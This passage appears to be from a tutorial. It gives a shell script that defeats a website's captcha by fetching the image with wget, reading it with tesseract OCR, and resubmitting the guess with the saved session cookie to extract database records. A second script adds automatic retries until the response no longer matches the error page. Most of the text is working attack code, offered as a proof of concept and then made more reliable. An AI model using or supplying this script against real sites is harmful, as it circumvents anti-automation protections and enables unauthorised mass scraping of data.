As you'll see, Linux has an OCR (optical character recognition) program, tesseract, capable of "reading" the captcha image shown to the user and writing the recognized characters to a text file.
With wget we can send HTTP requests to a website, save and load cookies, and write the responses to the filesystem. Putting it all together, we get a shell script that circumvents the captcha protection and extracts the data automatically (it succeeds roughly 60% of the time).
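#!/bin/sh
# Value to look up, taken here from the first command-line argument
query=$1
# Fetch the captcha image and keep the session cookie it is bound to
wget http://www.somesite.com/jcaptcha --save-cookies cookies.txt --keep-session-cookies -O /tmp/captcha.jpg 2> /dev/null
# Convert the JPEG to a grayscale TIFF for the OCR step
djpeg -grayscale /tmp/captcha.jpg | convert - /tmp/captcha.tiff
# tesseract writes the recognized text to jcaptcha.txt
tesseract /tmp/captcha.tiff jcaptcha
cap=$(tr -d '[:space:]' < jcaptcha.txt)
# Submit the query with the recognized captcha, reusing the same session
wget "http://www.somesite.com/servlet?niv=&nrpv=&query=$query&captcha=$cap" --load-cookies cookies.txt -O salida.txt 2> /dev/null
# Size of the response in bytes (the whole number, not just its first three digits)
tam=$(wc -c < salida.txt | tr -d ' ')
echo "$tam"
if [ "$tam" -ne 701 ]; then
    mv salida.txt "$query.txt"
fi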
You may wonder why the script uses a length of 701 bytes to detect whether the captcha has been defeated. It simply assumes that the default "error" page is 701 bytes long; a response of any other length is assumed to be data extracted from the database (OK, it's not the best approach, but it's just a PoC).
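Since the OCR only gets the captcha right part of the time, one natural extension is to retry until the response no longer looks like the error page. The following is a minimal sketch of that idea, not part of the original script: the names `ERROR_SIZE`, `is_error_page` and `retry_until_ok` are hypothetical, and it keeps the same assumption that the error page is exactly 701 bytes long.

```shell
#!/bin/sh
# Assumed byte length of the default "error" page (taken from the text above).
ERROR_SIZE=701

# is_error_page FILE
# Succeeds (exit status 0) when FILE is exactly ERROR_SIZE bytes long.
is_error_page() {
    size=$(wc -c < "$1" | tr -d ' ')
    [ "$size" -eq "$ERROR_SIZE" ]
}

# retry_until_ok MAX OUTFILE CMD [ARGS...]
# Runs CMD up to MAX times. CMD is expected to make one captcha attempt
# and write the server response to OUTFILE. Returns 0 as soon as OUTFILE
# is non-empty and does not look like the error page, 1 otherwise.
retry_until_ok() {
    max=$1
    out=$2
    shift 2
    attempt=1
    while [ "$attempt" -le "$max" ]; do
        "$@"
        if [ -s "$out" ] && ! is_error_page "$out"; then
            return 0
        fi
        attempt=$((attempt + 1))
    done
    return 1
}

# Example call, assuming a hypothetical function fetch_once that wraps the
# wget/djpeg/tesseract steps and writes the response to salida.txt:
#   retry_until_ok 5 salida.txt fetch_once "$query" && mv salida.txt "$query.txt"
```

Each attempt has to fetch a fresh captcha and cookie file, because a failed guess normally invalidates the captcha tied to that session. The size check is kept in a single function so that it can later be replaced by something more robust, such as searching the response for a known error string.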